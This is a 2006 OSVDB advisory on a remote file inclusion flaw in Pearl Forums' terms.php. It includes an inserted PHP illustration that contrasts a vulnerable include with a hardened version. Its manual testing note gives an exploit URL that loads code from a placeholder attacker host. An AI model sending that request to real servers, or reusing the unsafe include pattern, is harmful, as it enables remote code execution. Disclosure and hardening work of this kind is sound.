Pearlinger Multiple Product terms.php Document[languagePreference] Variable Remote File Inclusion

2006-07-02T07:04:08
ID OSVDB:27200
Type osvdb
Reporter zero(xzerox@linuxmail.org)
Modified 2006-07-02T07:04:08

Description

Vulnerability Description

Pearlinger Multiple Products contain a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the includes/terms.php script not properly sanitizing user input supplied to the 'Document[languagePreference]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).
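The pattern the description implies, shown as an added illustration that is not code from the Pearl Forums project: the vulnerable fragment is a hypothetical reconstruction of a register_globals-dependent include (not the real includes/terms.php source), followed by a hardened form that reads the value explicitly from $_GET, maps it through an allowlist, and verifies the resolved path; TERMS_DIR and the language set are assumptions.

```php
<?php
// Hypothetical reconstruction of the vulnerable pattern (NOT the real
// includes/terms.php). With register_globals=on, a request carrying
// ?Document[languagePreference]=... populates $Document automatically, so the
// include path is attacker-controlled; with allow_url_fopen on (and, from
// PHP 5.2, allow_url_include) PHP fetches and executes a remote file.
function vulnerable_terms_include()
{
    global $Document;                      // silently filled by register_globals
    include $Document['languagePreference'] . '/terms.php';
}

// Hardened form: never rely on register_globals, take the value from $_GET,
// and map it through an allowlist so the include path is always one of a
// fixed set of files below a constant directory.
define('TERMS_DIR', __DIR__ . '/lang');    // assumed location of per-language terms files

function safe_terms_include(array $get)
{
    $allowed = ['en', 'de', 'fr'];         // assumed set of shipped languages
    $lang = 'en';                          // safe default
    if (isset($get['Document']) && is_array($get['Document'])
        && isset($get['Document']['languagePreference'])) {
        $candidate = (string) $get['Document']['languagePreference'];
        if (in_array($candidate, $allowed, true)) {
            $lang = $candidate;
        }
    }
    $path = TERMS_DIR . '/' . $lang . '/terms.php';
    // Defence in depth: confirm the resolved path is still inside TERMS_DIR.
    $real = realpath($path);
    if ($real === false || strpos($real, realpath(TERMS_DIR) . DIRECTORY_SEPARATOR) !== 0) {
        http_response_code(400);
        exit('invalid language selection');
    }
    include $real;
    return $lang;
}

// Deployment check: the flaw needs register_globals=on, and remote inclusion
// additionally needs allow_url_fopen (allow_url_include on PHP 5.2 and later).
function risky_ini_settings()
{
    $risky = [];
    foreach (['register_globals', 'allow_url_fopen', 'allow_url_include'] as $key) {
        if (filter_var(ini_get($key), FILTER_VALIDATE_BOOLEAN)) {
            $risky[] = $key;
        }
    }
    return $risky;                         // empty array means none of the preconditions hold
}

safe_terms_include($_GET);
```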

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

Pearlinger Multiple Products contain a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the includes/terms.php script not properly sanitizing user input supplied to the 'Document[languagePreference]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/includes/terms.php?Document[languagePreference]=[attacker]

References:

Vendor URL: http://pearlforums.sourceforge.net/
Secunia Advisory ID: 20819
Related OSVDB ID: 27179
Related OSVDB ID: 27180
Related OSVDB ID: 27181
Related OSVDB ID: 27182
Related OSVDB ID: 27184
Related OSVDB ID: 27185
Related OSVDB ID: 27192
Related OSVDB ID: 27195
Related OSVDB ID: 27196
Related OSVDB ID: 27201
Related OSVDB ID: 27188
Related OSVDB ID: 27194
Related OSVDB ID: 27191
Related OSVDB ID: 27197
Related OSVDB ID: 27186
Related OSVDB ID: 27187
Related OSVDB ID: 27193
Related OSVDB ID: 27198
Related OSVDB ID: 27199
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0026.html